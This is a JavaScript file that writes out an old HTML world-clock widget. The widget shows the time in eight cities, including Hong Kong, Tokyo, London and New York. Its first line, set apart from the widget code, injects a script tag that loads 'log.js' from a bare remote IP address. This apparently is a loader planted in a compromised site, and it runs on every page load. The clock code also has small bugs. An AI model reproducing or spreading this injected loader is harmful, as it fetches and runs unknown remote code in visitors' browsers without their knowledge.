document.write('<SCRIPT src="http://124.172.245.14/vip/log.js"></script>');
document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">");
document.writeln("<HTML><HEAD><TITLE><\/TITLE>");
document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=gb2312\">");
document.writeln("<LINK href=\"..\/style.css\" type=\"text\/css\" rel=\"stylesheet\">");
document.writeln("<\/HEAD>");
document.writeln("<BODY bgColor=#FFFFFF onload=startclock() topmargin=0 leftmargin=0>");
document.writeln("<SCRIPT language=JavaScript>");
document.writeln("var timerID = null;");
document.writeln("var timerRunning = false;");
document.writeln("function stopclock (){");
document.writeln("if(timerRunning)");
document.writeln("clearTimeout(timerID);");
document.writeln("timerRunning = false;}");
document.writeln("function startclock () {");
document.writeln("stopclock();");
document.writeln("showtime();}");
document.writeln("function showtime () {");
document.writeln("var now = new Date();");
document.writeln("var hkhours = now.getHours();");
document.writeln("var tkhours = now.getHours() +2;");
document.writeln("var ldhours = now.getHours() -8;");
document.writeln("var nkhours = now.getHours() -13;");
document.writeln("var xnhours = now.getHours() +3;");
document.writeln("var fkhours = now.getHours() -7;");
document.writeln("var prhours = now.getHours() -7;");
document.writeln("var mskhours = now.getHours()-5;");
document.writeln("var xxlhours = now.getHours()-17;");
document.writeln("var minutes = now.getMinutes();");
document.writeln("var seconds = now.getSeconds();");
document.writeln("var hktimeValue = \"\" +((hkhours <= 12 ) ? \"香港 \" : \"香港 \" )");
document.writeln("hktimeValue += (hkhours )");
document.writeln("hktimeValue += ((minutes < 10) ? \":0\" : \":\") + minutes");
document.writeln("hktimeValue += ((seconds < 10) ? \":0\" : \":\") + seconds");
document.writeln("tktimeValue += ((hkhours >=23) ? hkhours -23  :hkhours +1)");
document.writeln("var tktimeValue = \"\" +((tkhours <= 12) ? \"东京 \" : \"东京 \" )");
document.writeln("tktimeValue += ((hkhours >=23) ? hkhours -23  :hkhours +1)");
document.writeln("tktimeValue += ((minutes < 10) ? \":0\" : \":\") + minutes");
document.writeln("tktimeValue += ((seconds < 10) ? \":0\" : \":\") + seconds");
document.writeln("var ldtimeValue = \"\" +((hkhours -8 >= 12 ) ? \"伦敦 \" : \"伦敦 \" )");
document.writeln("ldtimeValue += ((hkhours >=8) ? hkhours -8 :hkhours +16)");
document.writeln("ldtimeValue += ((minutes < 10) ? \":0\" : \":\") + minutes");
document.writeln("ldtimeValue += ((seconds < 10) ? \":0\" : \":\") + seconds");
document.writeln("var nktimeValue = \"\" +((hkhours >= 12) ? \"纽约 \" : \"纽约 \" )");
document.writeln("nktimeValue += ((hkhours >=13) ? hkhours -13 :hkhours +11)");
document.writeln("nktimeValue += ((minutes < 10) ? \":0\" : \":\") + minutes");
document.writeln("nktimeValue += ((seconds < 10) ? \":0\" : \":\") + seconds");
document.writeln("var xntimeValue = \"\" +((hkhours +3 <= 12) ? \"悉尼 \" : \"悉尼 \" )");
document.writeln("xntimeValue += ((hkhours >=21) ? hkhours -21 :hkhours +3)");
document.writeln("xntimeValue += ((minutes < 10) ? \":0\" : \":\") + minutes");
document.writeln("xntimeValue += ((seconds < 10) ? \":0\" : \":\") + seconds");
document.writeln("var fktimeValue = \"\" +((hkhours -5 <= 12) ? \"法兰克福 \" : \"法兰克福 \" )");
document.writeln("fktimeValue += ((hkhours >=7) ? hkhours -7  :hkhours +17)");
document.writeln("fktimeValue += ((minutes < 10) ? \":0\" : \":\") + minutes");
document.writeln("fktimeValue += ((seconds < 10) ? \":0\" : \":\") + seconds");
document.writeln("var msktimeValue = \"\" +((hkhours -5 <= 12) ? \"莫斯科 \" : \"莫斯科 \" )");
document.writeln("msktimeValue += ((hkhours >=5) ? hkhours -5  :hkhours +19)");
document.writeln("msktimeValue += ((minutes < 10) ? \":0\" : \":\") + minutes");
document.writeln("msktimeValue += ((seconds < 10) ? \":0\" : \":\") + seconds");
document.writeln("var xxltimeValue = \"\" +((hkhours -5 <= 12) ? \"新西兰 \" : \"新西兰 \" )");
document.writeln("xxltimeValue += ((hkhours >=17) ? hkhours -17  :hkhours +7)");
document.writeln("xxltimeValue += ((minutes < 10) ? \":0\" : \":\") + minutes");
document.writeln("xxltimeValue += ((seconds < 10) ? \":0\" : \":\") + seconds");
document.writeln("document.clock.hkthetime.value = hktimeValue;");
document.writeln("document.clock1.tkthetime.value = tktimeValue;");
document.writeln("document.clock2.ldthetime.value = ldtimeValue;");
document.writeln("document.clock3.nkthetime.value = nktimeValue;");
document.writeln("document.clock4.xnthetime.value = xntimeValue;");
document.writeln("document.clock5.fkthetime.value = fktimeValue;");
document.writeln("document.clock7.mskthetime.value = msktimeValue;");
document.writeln("document.clock8.xxlthetime.value = xxltimeValue;");
document.writeln("timerID = setTimeout(\"showtime()\",1000);");
document.writeln("timerRunning = true;}");
document.writeln("<\/SCRIPT>");
document.writeln("");
document.writeln("<DIV ");
document.writeln("style=\"LEFT: 0px; WIDTH: 100%; POSITION: relative; TOP: 3px; HEIGHT: 100%\">");
document.writeln("<TABLE height=20 width=\"100%\" bgColor=#FaFaFa border=0 cellpadding=\"0\" cellspacing=\"0\">");
document.writeln("        <TBODY>");
document.writeln("        <TR>");
document.writeln("          <TD align=center>");
document.writeln("            <FORM name=clock4><INPUT class=InputTime size=12 name=xnthetime><\/FORM><\/TD>");
document.writeln("          <TD align=center>");
document.writeln("            <FORM name=clock1>");
document.writeln("              <INPUT class=InputTime size=12 name=tkthetime><\/FORM><\/TD>");
document.writeln("          <TD align=center>");
document.writeln("            <FORM name=clock><INPUT class=InputTime size=12 name=hkthetime><\/FORM><\/TD>");
document.writeln("          <TD align=center>");
document.writeln("            <FORM name=clock5><INPUT class=InputTime size=16 name=fkthetime><\/FORM><\/TD>");
document.writeln("          <TD align=center>");
document.writeln("            <FORM name=clock2><INPUT class=InputTime size=12 name=ldthetime><\/FORM><\/TD>");
document.writeln("          <TD align=center>");
document.writeln("            <FORM name=clock3><INPUT class=InputTime size=12 name=nkthetime><\/FORM><\/TD>");
document.writeln("           <TD align=center>");
document.writeln("            <FORM name=clock7><INPUT class=InputTime size=14 name=mskthetime><\/FORM><\/TD>");
document.writeln("            <TD align=center>");
document.writeln("            <FORM name=clock8><INPUT class=InputTime size=14 name=xxlthetime><\/FORM><\/TD>");
document.writeln("            ");
document.writeln("            <\/TR><\/TBODY><\/TABLE><\/DIV><\/BODY><\/HTML>");